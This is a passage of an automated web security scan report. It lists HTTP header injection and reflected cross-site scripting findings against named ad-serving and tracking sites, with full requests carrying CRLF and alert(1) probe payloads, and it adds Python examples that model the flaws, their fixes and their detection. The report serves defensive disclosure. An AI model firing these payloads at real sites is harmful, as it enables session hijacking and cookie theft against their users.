Set-Cookie: u2=76ac510f-28bb-4b8e-bda1-5dd09b3e46db3Gz070; expires=Sat, 07-May-2011 08:21:35 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=46baf
393469f66ab
&WMPV=0; expires=Sat, 07-May-2011 08: 21:35 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 06 Feb 2011 13:21:34 GMT
Connection: close
Content-Length: 0


3.25. http://bs.serving-sys.com/BurstingPipe/adServer.bs [wmpv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the wmpv request parameter is copied into the Set-Cookie response header. The payload 8bddc%0d%0a1cb899d5230 was submitted in the wmpv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4388343~~0~~~^ebBelowTheFold~0~0~01020&OptOut=0&ebRandom=0.06774244247935712&flv=10.1103&wmpv=8bddc%0d%0a1cb899d5230&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/
Origin: http://www.baselinemag.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=57a20fa3-e884-41e5-a038-fc8ea0d310073Gz050; expires=Sat, 07-May-2011 08:21:35 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=8bddc
1cb899d5230
; expires=Sat, 07-May-2011 08: 21:35 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 06 Feb 2011 13:21:35 GMT
Connection: close
Content-Length: 0


3.26. http://live.activeconversion.com/webtracker/track2.html [avc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://live.activeconversion.com
Path:   /webtracker/track2.html

Issue detail

The value of the avc request parameter is copied into the Set-Cookie response header. The payload 2106c%0d%0aeb95574723e was submitted in the avc parameter. This caused a response containing an injected HTTP header.

Request

GET /webtracker/track2.html?method=track&pid=31021&uclkt=1&alh=http%3A//www.owneriq.com/ownership-targeting%3Fsrc%3D728x90_blue&avc=2106c%0d%0aeb95574723e&source=&keyword=&ref=http%3A//homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%252527%25253balert%252528document.cookie%252529%25252f%25252f8fcf167d281/d/type/product_problem&pageTitle=Ownership%20Targeting%20%7C%20OwnerIQ&pageUrl=http%3A%2F%2Fwww.owneriq.com%2Fownership-targeting%3Fsrc%3D728x90_blue&java=1&amcs=0.41058127977885306 HTTP/1.1
Host: live.activeconversion.com
Proxy-Connection: keep-alive
Referer: http://www.owneriq.com/ownership-targeting?src=728x90_blue
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 22:35:44 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store, no-cache, max-age=0, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=C1524BDBD48BB3A5968A32D0C1902338; Path=/webtracker
Set-Cookie: _wt_31021="1296945354839|2106c
eb95574723e
|0"; Max-Age=630720000;Path=/; HttpOnly
P3P: policyref="http://www.activeconversion.com/w3c/p3p.xml", CP="NOI DSP LAW PSA OUR IND STA NAV COM"
Connection: close
Content-Type: image/png
Content-Length: 68

.PNG
.
...IHDR.....................IDATx.c`...............IEND.B`.

3.27. http://mm.chitika.net/track [target parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mm.chitika.net
Path:   /track

Issue detail

The value of the target request parameter is copied into the Location response header. The payload 7ddb9%0d%0ad1e8da5d420 was submitted in the target parameter. This caused a response containing an injected HTTP header.

Request

GET /track?target=7ddb9%0d%0ad1e8da5d420&xargs=1Owx8oFMt4m2YkqUMiPXwDnPUhRRY7ZEJ9LJTWSrnbZhgBfErhtcKKOiM6mjHeLYQPOhFTlgMiQNUi0Wzinee2B3WGL1cDC9iHCONuiA3%2FJLEbd3x%2FFU5i2%2FejQpwMx5yyDTjsWiUUsISHcBq5Cyt5RwSg5CKdbMkrYy9xwqz2dX1VJJLhn25UnM9r3EOr3kRAA7PYs93YlDtwLI5JLm3nWA7dYYrFPozVln3uSAGFgS4lCNg3xHbrApZyDMytFV2l2C7ULWrmQ1l9bzagD%2FAT68Pby1uNFEA22B%2FM90suzy%2FYjy3MzE23bVmK7lC9jUeyBWeaoqNWxXGRluKS44nJO34%2BrioOQV%2FxSJ%2By45Fo8X%2FyWC5WegF0dVp6w1Bt2lFzVLgvn19KwnF%2BFWR4G6ZhENP1sKJJ8ayL0Tdvc1we8TPqrcCxAlGk5VR%2F94hQcEKqe6WwkOm3ytJOOEop9VFSJq%2FtFSYoywNhWzr%2BIMaHWBqkqSde8xNIVIc5X5QSFeoSqyFJwnv8A%3D&template=v1-450xauto\ HTTP/1.1
Host: mm.chitika.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _cc=G/SkJiIEkgB5jwthOgp2U7fj6wwhdgvL4c0tN7QIkjl+9DY+kxm0FYEPwYHEtzd1Eb9GVhAFySrB7FsCah5yekHnHk86QdWmqzPlPoX9fVgKhjoJ7H0CpjFT5Hp1o2UMeStsZFPsF38vogWeCxRsANnVfye1gm5VQVRitA3zocW7G6iOKSNpC8nW/fSMYPkd+FCgRcmr74lmkl5cwzW3Czwl6LeM3oQBJIYcJ6NbVb7AFAn8X+k1IsMDj5bEGLsE44aH3XGVfZEeq7YK0yCm1xoznT+oB6MyoGrFo+3L+n46HJMn/fIuhcbGfmpCGIWgP/8azfwodcqzdnmXzDHV02SLzkuIP4TROEiHhvvFYJCve1mdj9NNH2b6m71cRkwsP7WlTZEvF7RLkkrfjucSwCzhr5Z1qjMilr/trLois3rxw1y+NdQfz3XqMUHrYIFc6GSu7GKj22sCBmPetmAel7epjXByEoA7.VuO7eR5Qy1Z0VmN7sMLZzA.4;

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 22:58:25 GMT
Server: Apache
P3P: policyref="http://scripts.chitika.net/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: _cc=...[SNIP]....cEUs/P3Fg8JIxIN0nB7icA.4; path=/; domain=.chitika.net; expires=Sun, 05-Feb-2012 22:58:25 GMT
Location: 7ddb9
d1e8da5d420

Content-Length: 202
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="7ddb9
d1e8da5d420">here</a>.</p>
</body></html
...[SNIP]...

3.28. http://www.salesforce.com/servlet/servlet.WebToLead [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.salesforce.com
Path:   /servlet/servlet.WebToLead

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 7d788%0d%0a7be81555d22 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /servlet/7d788%0d%0a7be81555d22 HTTP/1.1
Host: www.salesforce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: /servlet/7d788
7be81555d22
/
Date: Sat, 05 Feb 2011 22:09:45 GMT
Connection: close
Content-Length: 93

The URL has moved to <a href="/servlet/7d788
7be81555d22/">/servlet/7d788
7be81555d22/</a>

3.29. https://www.salesforce.com/servlet/servlet.WebToLead [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.salesforce.com
Path:   /servlet/servlet.WebToLead

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 1b8d9%0d%0af0e07ef42ca was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /servlet/1b8d9%0d%0af0e07ef42ca HTTP/1.1
Host: www.salesforce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: /servlet/1b8d9
f0e07ef42ca
/
Date: Sat, 05 Feb 2011 22:10:03 GMT
Connection: close
Content-Length: 93

The URL has moved to <a href="/servlet/1b8d9
f0e07ef42ca/">/servlet/1b8d9
f0e07ef42ca/</a>
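
The mechanism behind 3.28 and 3.29, as an added example that is not part of the original report or of the target's code: a constructed Python model of a redirect that concatenates a URL-decoded path segment straight into the Location header, the same redirect with control characters rejected and the segment percent-encoded, and the scanner-style check that decides whether the canary after the CR LF landed at the start of a new header line. The `/servlet/` path shape is taken from the findings; the Set-Cookie payload and the `Content-Length: 0` responses are illustrative assumptions.

```python
"""
HTTP header injection through a redirect: a path segment containing CR LF is
copied into Location, so the bytes after the CR LF start a new header line.
Constructed model of the behaviour reported in 3.28/3.29, not the target's code.
"""
from __future__ import annotations

import re
from urllib.parse import quote

CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")


def vulnerable_redirect(segment: str) -> bytes:
    """Naive 301: the already URL-decoded path segment is concatenated into
    Location with no filtering, so %0d%0a in the request becomes a real CR LF
    inside the header block."""
    return (
        "HTTP/1.1 301 Moved Permanently\r\n"
        f"Location: /servlet/{segment}/\r\n"
        "Content-Length: 0\r\n"
        "\r\n"
    ).encode("latin-1")


def is_safe_redirect_target(segment: str) -> bool:
    """Layer 1, validation: anything emitted in a header must contain no
    control characters at all (CR, LF, NUL, ...). Reject, do not strip."""
    return CONTROL_CHARS.search(segment) is None


def safe_redirect(segment: str) -> bytes:
    """Layer 1 + layer 2: reject control characters, then percent-encode the
    segment so only unreserved characters reach the header."""
    if not is_safe_redirect_target(segment):
        raise ValueError("control characters in redirect target")
    return (
        "HTTP/1.1 301 Moved Permanently\r\n"
        f"Location: /servlet/{quote(segment, safe='')}/\r\n"
        "Content-Length: 0\r\n"
        "\r\n"
    ).encode("latin-1")


def parse_headers(raw: bytes) -> list[tuple[str, str]]:
    """Split a raw response into (name, value) pairs the way a lenient client
    would, so an injected line shows up as an ordinary header."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    pairs = []
    for line in head.split(b"\r\n")[1:]:  # skip the status line
        name, _, value = line.partition(b":")
        pairs.append((name.decode("latin-1").strip(), value.decode("latin-1").strip()))
    return pairs


def header_injection_detected(raw: bytes, canary: str) -> bool:
    """Scanner-style check for a probe of the form '<prefix>\\r\\n<canary>':
    if the canary now begins a line of the header block, the CR LF terminated
    the Location header and the canary was emitted as a new header line."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    return any(line.startswith(canary.encode("latin-1"))
               for line in head.split(b"\r\n")[1:])


if __name__ == "__main__":
    probe = "7d788\r\n7be81555d22"  # the 3.28 payload after URL decoding
    print(header_injection_detected(vulnerable_redirect(probe), "7be81555d22"))
    # A real attack supplies a complete header instead of a canary (constructed):
    print(parse_headers(vulnerable_redirect("x\r\nSet-Cookie: sid=attacker")))
    print(safe_redirect("servlet.WebToLead").decode("latin-1"))
```

Rejection comes before encoding on purpose: percent-encoding would also neutralise a CR LF, but only at the places where it is applied, whereas refusing control characters at the boundary protects every header the segment might later reach.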

4. Cross-site scripting (reflected)
There are 700 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses. First, input should be validated as strictly as possible on arrival, given the kind of content it is expected to contain, and input which fails the validation should be rejected rather than sanitised. Second, user input should be HTML-encoded at any point where it is copied into application responses, with every HTML metacharacter (including < > " ' and =) replaced by the corresponding HTML entity. In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


4.1. http://a.ligatus.com/timeout.php [ids parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.ligatus.com
Path:   /timeout.php

Issue detail

The value of the ids request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8918"><script>alert(1)</script>cc16b0d36e8 was submitted in the ids parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /timeout.php?ids=9470d8918"><script>alert(1)</script>cc16b0d36e8 HTTP/1.1
Host: a.ligatus.com
Proxy-Connection: keep-alive
Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 17:44:28 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Accept-Ranges: bytes
Cache-Control: private, max-age=600
Age: 0
Expires: Sun, 06 Feb 2011 17:54:28 GMT
Connection: Keep-Alive
Content-Length: 116

<script src="http://e.ligatus.com/LigatusFallback.gif?ids=9470d8918"><script>alert(1)</script>cc16b0d36e8"></script>

4.2. http://a.ligatus.com/timeout.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.ligatus.com
Path:   /timeout.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b3a4"><script>alert(1)</script>eb71085dfca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /timeout.php?ids=/3b3a4"><script>alert(1)</script>eb71085dfca9470 HTTP/1.1
Host: a.ligatus.com
Proxy-Connection: keep-alive
Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 17:45:05 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Accept-Ranges: bytes
Cache-Control: private, max-age=600
Age: 0
Expires: Sun, 06 Feb 2011 17:55:05 GMT
Connection: Keep-Alive
Content-Length: 117

<script src="http://e.ligatus.com/LigatusFallback.gif?ids=/3b3a4"><script>alert(1)</script>eb71085dfca9470"></script>

4.3. http://ad-emea.doubleclick.net/adj/N1120.Mittelstandswiki/B5089496 [adurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adj/N1120.Mittelstandswiki/B5089496

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f6a0e"-alert(1)-"872292d8e2e was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N1120.Mittelstandswiki/B5089496;sz=336x280;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B9MZ-29VOTYi_OZztlQfnzZ2uCtb3kP4BAAAAEAEgADgAWOag4YweYMmGo4fUo4AQggEXY2EtcHViLTUxMjE2OTA0MjEzMzc1MDayARd3d3cubWl0dGVsc3RhbmRzYmxvZy5kZboBCjMwMHgyNTBfYXPIAQnaAWZodHRwOi8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506&adurl=f6a0e"-alert(1)-"872292d8e2e HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7905
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 06 Feb 2011 17:47:22 GMT
Expires: Sun, 06 Feb 2011 17:47:22 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Jan 17 10:59:03 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
nQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506&adurl=f6a0e"-alert(1)-"872292d8e2ehttp://www.ibm.com/innovation/de/systemx/intel?cmp=100K3&ct=100K303A&cr=Mittelstandswiki_Rotation&cm=B&csr=neiotde_mm_intel-q12011&ccy=DE&cd=2011-01-06&cn=q1_mm_off_systemxintel_fla_336x280_de&csz=336x
...[SNIP]...
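
The two reflection contexts this section reports, as an added example that is not part of the original report or of the ad servers' code: 4.1 and 4.2 echo a parameter into a double-quoted src attribute, and 4.3 onward echo it into a quoted JavaScript string, the context the Remediation detail above calls inherently dangerous. The constructed Python below reproduces each vulnerable template beside a version that applies the two layers named under Issue remediation (strict validation, then encoding specific to the output context), and includes the scanner-style check that the probe came back verbatim. The `cdn.example.com` URL, the numeric allow-list for `ids`, the `var adurl` template and the function names are illustrative assumptions; only the probe strings are copied from the findings.

```python
"""
Context-aware output encoding for the two reflected-XSS contexts in this
report. Constructed model, not the ad servers' code.
"""
import html
import json
import re
from urllib.parse import quote

# Probes copied from findings 4.1 and 4.3; the hex canaries around alert(1)
# are what the scanner searches for in the response.
ATTR_PROBE = 'd8918"><script>alert(1)</script>cc16b0d36e8'
JS_PROBE = 'f6a0e"-alert(1)-"872292d8e2e'

# Assumption: ids is a comma-separated list of numeric identifiers.
IDS_ALLOWED = re.compile(r"[0-9]{1,32}(,[0-9]{1,32})*")


def render_attr_vulnerable(ids: str) -> str:
    """4.1/4.2 pattern: the parameter is concatenated into a double-quoted src
    attribute, so a " in the value closes the attribute and > closes the tag."""
    return f'<script src="https://cdn.example.com/fallback.gif?ids={ids}"></script>'


def render_js_vulnerable(adurl: str) -> str:
    """4.3-4.12 pattern: the parameter is concatenated into a JavaScript string
    literal, so a matching quote ends the literal and what follows is code."""
    return f'var adurl = "{adurl}";'


def ids_is_valid(ids: str) -> bool:
    """Layer 1: allow-list validation; anything else is rejected, not cleaned."""
    return IDS_ALLOWED.fullmatch(ids) is not None


def encode_html_attr(value: str) -> str:
    """Layer 2 for an attribute context: entity-encode & < > " and ' so the
    value can never terminate the attribute or the tag."""
    return html.escape(value, quote=True)


def encode_js_string(value: str) -> str:
    """Layer 2 for a script context: emit a complete JSON string literal
    (quotes, backslashes and control characters escaped), then also escape
    < > & / so the literal can never contain </script> and close the block.
    The surrounding template must not add quotes of its own."""
    literal = json.dumps(value)
    return (literal.replace("<", "\\u003c").replace(">", "\\u003e")
            .replace("&", "\\u0026").replace("/", "\\/"))


def render_attr_hardened(ids: str) -> str:
    """Both layers: reject anything outside the allow-list, URL-encode the
    query value, then attribute-encode the whole URL."""
    if not ids_is_valid(ids):
        raise ValueError("ids must be a comma-separated list of digits")
    url = "https://cdn.example.com/fallback.gif?ids=" + quote(ids, safe="")
    return f'<script src="{encode_html_attr(url)}"></script>'


def render_js_hardened(adurl: str) -> str:
    """A click-through URL cannot be tightly allow-listed, so the script
    context relies on encoding; the literal carries its own delimiters, which
    also neutralises the single-quote variant of the probe (4.4)."""
    return f"var adurl = {encode_js_string(adurl)};"


def reflected_unencoded(body: str, probe: str) -> bool:
    """Scanner-style check: the probe appears byte-for-byte in the response."""
    return probe in body


if __name__ == "__main__":
    for label, body in (
        ("attr vulnerable", render_attr_vulnerable(ATTR_PROBE)),
        ("js vulnerable  ", render_js_vulnerable(JS_PROBE)),
        ("js hardened    ", render_js_hardened(JS_PROBE)),
    ):
        print(label, reflected_unencoded(body, ATTR_PROBE if "attr" in label else JS_PROBE), body)
    print("attr hardened  ", render_attr_hardened("9470"))
```

Note that `encode_js_string` returns the quotes as part of the literal; a template written as `'"' + encode(x) + '"'` would reintroduce the bug, because JSON escaping is only correct when the encoder controls the delimiters.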

4.4. http://ad-emea.doubleclick.net/adj/N1120.Mittelstandswiki/B5089496 [adurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adj/N1120.Mittelstandswiki/B5089496

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7a2e8'-alert(1)-'f747d321270 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N1120.Mittelstandswiki/B5089496;sz=336x280;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B9MZ-29VOTYi_OZztlQfnzZ2uCtb3kP4BAAAAEAEgADgAWOag4YweYMmGo4fUo4AQggEXY2EtcHViLTUxMjE2OTA0MjEzMzc1MDayARd3d3cubWl0dGVsc3RhbmRzYmxvZy5kZboBCjMwMHgyNTBfYXPIAQnaAWZodHRwOi8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506&adurl=7a2e8'-alert(1)-'f747d321270 HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7905
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 06 Feb 2011 17:47:28 GMT
Expires: Sun, 06 Feb 2011 17:47:28 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Jan 17 10:59:03 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
nQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506&adurl=7a2e8'-alert(1)-'f747d321270http://www.ibm.com/innovation/de/systemx/intel?cmp=100K3&ct=100K303A&cr=Mittelstandswiki_Rotation&cm=B&csr=neiotde_mm_intel-q12011&ccy=DE&cd=2011-01-06&cn=q1_mm_off_systemxintel_fla_336x280_de&csz=336x
...[SNIP]...

4.5. http://ad-emea.doubleclick.net/adj/N1120.Mittelstandswiki/B5089496 [ai parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adj/N1120.Mittelstandswiki/B5089496

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73258'-alert(1)-'86e7173ff52 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N1120.Mittelstandswiki/B5089496;sz=336x280;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B9MZ-29VOTYi_OZztlQfnzZ2uCtb3kP4BAAAAEAEgADgAWOag4YweYMmGo4fUo4AQggEXY2EtcHViLTUxMjE2OTA0MjEzMzc1MDayARd3d3cubWl0dGVsc3RhbmRzYmxvZy5kZboBCjMwMHgyNTBfYXPIAQnaAWZodHRwOi8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE73258'-alert(1)-'86e7173ff52&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506&adurl=;ord=57634238? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
